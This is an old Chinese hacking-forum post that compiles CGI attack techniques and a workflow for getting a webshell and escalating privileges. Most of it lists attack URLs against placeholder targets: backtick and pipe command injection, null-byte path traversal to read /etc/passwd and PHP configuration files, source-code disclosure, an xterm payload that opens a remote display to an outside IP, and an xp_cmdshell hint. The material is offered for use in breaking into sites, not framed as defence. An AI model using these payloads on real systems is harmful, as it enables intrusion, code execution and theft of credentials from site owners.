找回密码
 开放注册

QQ登录

只需一步,快速开始

微信登录

微信扫码,快速开始

搜索
查看: 824|回复: 0

CGI Hack与Webshell研究资料整理

[复制链接]

739

主题

468

回帖

4307

牛毛

论坛管理员

狼群

积分
4347
发表于 2008-5-22 21:39:45 | 显示全部楼层 |阅读模式
总体思路,跳过限制,查看敏感文件和密码相关文件。写入一句话cgi,进后台试传webshell(后台如果加验证或者MD5过的时候,可以试着  
cookies欺骗,本地提交),寻找可执行的目录和相关函数,拿shell…………》提权  
感谢EMM和ps的睿智和他们高超的脚本技术,还有以前老红4的脚本群英和国外的那些牛淫们  
注“  
perl脚本的漏洞大多出在open()、system()或者 ’’调用中。前者允许读写和执行,而后两个允许执行。  
以POST的方法发送表格的话,就不能蒙混过关(%00将不会被解析),所以我们大部分用GET  
QQ 9100722
http://target.com/cgi-bin/home/news/sub.pl?12 随意构造  QQ 9100722

http://target.com/cgi-bin/home/news/sub.pl?& 换个字符,也许可以执行呢 QQ 9100722

http://target.com/cgi-bin/home/news/sub.pl?`ls` 单引号  QQ 9100722

http://target.com/cgi-bin/home/news/sub.pl?`id`  QQ 9100722

http://target.com/cgi-bin/home/news/sub.pl?`IFS=!;uname!-a`  
http://target.com/cgi-bin/home/news/sub.pl?`cat<’/home1/siteadm/cgi-bin/home/news/sub.pl’` 非常好的思路,把代码cat回来显示  

http://target.com/test.pl;ls|  
http://target.com/index.cgi?page=|ls+-la+/%0aid%0awhich+xterm|  
http://target.com/index.cgi?page=|xterm+-isplay+10.0.1.21:0.0+%26|  
http://target.com/test.pl?’id’ 类似’’内的操作和命令执行自己构造  
比如:cat<’/home1/siteadm/cgi-bin/home/news/test.pl’` 把pl代码显示出来。  
http://target.com/index.cgi?page=;dir+c:\\|&cid=03417 类似asp的Sql injection  

http://target.com/test.pl?&........ /../../etc/passwd  

http://www.target.org/cgi-bin/cl ... info.pl?user=./test 前面加./  
http://www.target.org/cgi-bin/cl ... nfo.pl?user=test%00 注意后面的 %00 别弄丢了  
http://www.target.org/cgi-bin/cl ... ../../etc/passwd%00  

http://www.target.org/show.php?f ... /include/config.php 查看php代码  
http://www.target.org/show.php?f ... ng/admin/global.php  

emm和ps的一句话
QQ 9100722

http://www.target.org/cgi-bin/cl ... /../../../bin/ls%20  

>bbb%20|  
QQ 9100722

http://www.target.org/cgi-bin/club/scripts\\’less showpost.pl\\’ 并且寻找(用\\’/\\’)\\’Select\\’ 字符串  
QQ 9100722

http://www.target.org/cgi-bin/cl ... bin/sh.elf?ls+/http 这里的是elf是CCS中文linux操作系统特征  
http://www.target.org/csapi/..%c0%afhttp/china.sh”+.elf?”+&+ls+/bin  

相关html为后缀的脚本技术,继续深挖中,但是不可质疑的是提交数据查询语句也是一种完美的方法  
http://target.com/index.html#cmd.exe  
http://target.com/index.html?dummyparam=xp_cmdshell  
lynx http://target.com/cgi-bin/htmlscript?../../../../etc/passwd ;


PS:很久前整理asp注射和php注射大全都是私下给好友的,不知道哪个马甲不够意思,就发了出去。现在满bbs和各动画站点都能看到,而且  
作者乱七八糟, 幸亏吃亏以后,再整理或者写的其他文章技巧,只给几个特好的朋友。再也不敢乱发了,用pinke话说,\"我写/发现个东西我  
容易吗,不知道怎么就被人做成动画或者教程,拿来赚钱也罢了,还要留一句话,没什么技术,黑站就这么简单.\" 鄙视这些人们……有本事你  
们自己写个lcx,或者什么shell去?我写不来,但是用朋友的,我也心安理得
您需要登录后才可以回帖 登录 | 开放注册

本版积分规则

帮助|Archiver|小黑屋|通信管理局专项备案号:[2008]238号|NB5用户社区 ( 皖ICP备08004151号;皖公网安备34010402700514号 )

GMT+8, 2025-1-12 04:00 , Processed in 0.111689 second(s), 23 queries , Yac On.

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表